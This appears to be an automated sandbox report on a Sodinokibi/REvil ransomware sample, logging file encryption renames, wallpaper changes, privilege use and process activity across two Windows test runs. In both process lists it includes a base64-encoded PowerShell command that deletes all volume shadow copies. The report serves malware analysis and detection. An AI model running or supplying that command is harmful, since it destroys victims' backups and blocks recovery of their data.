Analysis Overview
SHA256
0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19
Threat Level: Known bad
The file 0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19 was found to be: Known bad.
Malicious Activity Summary
Sodin,Sodinokibi,REvil
Sodinokibi family
Sodinokibi/Revil sample
Modifies extensions of user files
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-30 08:04
Signatures
Sodinokibi family
Sodinokibi/Revil sample
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-30 08:04
Reported
2022-01-30 13:32
Platform
win7-en-20211208
Max time kernel
117s
Max time network
131s
Command Line
Signatures
Sodin,Sodinokibi,REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\SuspendSkip.tif => \??\c:\users\admin\pictures\SuspendSkip.tif.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnlockSubmit.png => \??\c:\users\admin\pictures\UnlockSubmit.png.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\SubmitLimit.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\HideConvert.tif => \??\c:\users\admin\pictures\HideConvert.tif.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\InstallRequest.png => \??\c:\users\admin\pictures\InstallRequest.png.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\MountDisable.crw => \??\c:\users\admin\pictures\MountDisable.crw.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairTest.crw => \??\c:\users\admin\pictures\RepairTest.crw.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitLimit.tiff => \??\c:\users\admin\pictures\SubmitLimit.tiff.895nv3v | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6q2.bmp" | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 1744 wrote to memory of 1916 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe
"C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/1744-54-0x0000000075761000-0x0000000075763000-memory.dmp
memory/1916-55-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp
memory/1916-57-0x0000000002950000-0x0000000002952000-memory.dmp
memory/1916-58-0x0000000002952000-0x0000000002954000-memory.dmp
memory/1916-59-0x0000000002954000-0x0000000002957000-memory.dmp
memory/1916-56-0x000007FEF2CD0000-0x000007FEF382D000-memory.dmp
memory/1916-60-0x000000001B760000-0x000000001BA5F000-memory.dmp
memory/1916-61-0x000000000295B000-0x000000000297A000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-30 08:04
Reported
2022-01-30 13:33
Platform
win10-en-20211208
Max time kernel
102s
Max time network
139s
Command Line
Signatures
Sodin,Sodinokibi,REvil
Modifies extensions of user files
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File renamed | C:\Users\Admin\Pictures\ResetOut.tiff => \??\c:\users\admin\pictures\ResetOut.tiff.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ShowOpen.raw => \??\c:\users\admin\pictures\ShowOpen.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WriteTest.raw => \??\c:\users\admin\pictures\WriteTest.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\ConvertFromImport.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File opened for modification | \??\c:\users\admin\pictures\ResetOut.tiff | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromImport.tiff => \??\c:\users\admin\pictures\ConvertFromImport.tiff.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ExitSelect.raw => \??\c:\users\admin\pictures\ExitSelect.raw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RepairRequest.crw => \??\c:\users\admin\pictures\RepairRequest.crw.z005me5 | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Enumerates connected drives
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xsa3kum7.bmp" | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
Drops file in Program Files directory
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
| Token: SeAuditPrivilege | N/A | C:\Windows\system32\vssvc.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 964 wrote to memory of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 964 wrote to memory of 2500 | N/A | C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe
"C:\Users\Admin\AppData\Local\Temp\0f48d0cdecc581ccc73b11ce229c21522d23996eb4f1d88c892e6a68b7a4ea19.exe"
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
Files
memory/2500-123-0x000001CBEBAC0000-0x000001CBEBAE2000-memory.dmp
memory/2500-124-0x000001CBEB8A3000-0x000001CBEB8A5000-memory.dmp
memory/2500-122-0x000001CBEB8A0000-0x000001CBEB8A2000-memory.dmp
memory/2500-128-0x000001CBEC5B0000-0x000001CBEC626000-memory.dmp